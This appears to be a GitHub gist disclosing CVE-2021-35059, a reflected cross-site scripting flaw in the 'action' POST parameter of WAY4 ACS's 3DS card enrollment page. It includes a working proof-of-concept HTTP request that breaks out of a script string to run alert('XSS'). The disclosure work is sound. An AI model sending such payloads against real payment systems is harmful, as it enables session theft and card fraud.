Skip to content

Instantly share code, notes, and snippets.

@exviry
Last active Jun 22, 2021
Embed
What would you like to do?
CVE-2021-35059
------------------------------------------
A reflected cross-site scripting (XSS) vulnerability in WAY4 ACS before 1.2.278-2693 allows remote attackers to inject arbitrary JavaScript or HTML code via the 'action' parameter in a 3DS card enrollment page.
------------------------------------------
[Additional Information]
During penetration testing of our clients' infrastructure, we discovered vulnerabilities in a third-party software - WAY4 ACS.
Application writes data of the 'action' POST-parameter to a page /way4acs/enroll without any sanitization which may lead to JavaScript or HTML-code execution.
Request example which trigger XSS:
POST /way4acs/enroll HTTP/1.1
Host: application
Connection: close
Content-Length: 79
Content-Type: application/x-www-form-urlencoded
action=canary"==="canary"))%0aa='';%0a}%0aalert("XSS");%0aif+(el){%0aif(("check
------------------------------------------
[VulnerabilityType Other]
Cross-site scripting (XSS)
------------------------------------------
[Vendor of Product]
OpenWay Group
------------------------------------------
[Affected Product Code Base]
WAY4 ACS before V.1.2.278-2693
------------------------------------------
[Has vendor confirmed or acknowledged the vulnerability?]
True
------------------------------------------
[Affected Component]
/way4acs/enroll
-----------------------------------------
[Attack Type]
Remote
------------------------------------------
[Discoverer]
Aleksey Shupletsov
Deiteriy Co. Ltd. (https://deiteriylab.com/)
------------------------------------------
[Reference]
OpenWay Group (https://www.openwaygroup.com/way4-platform)
Aleksey Shupletsov / Deiteriy Co. Ltd. (https://deiteriylab.com/)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment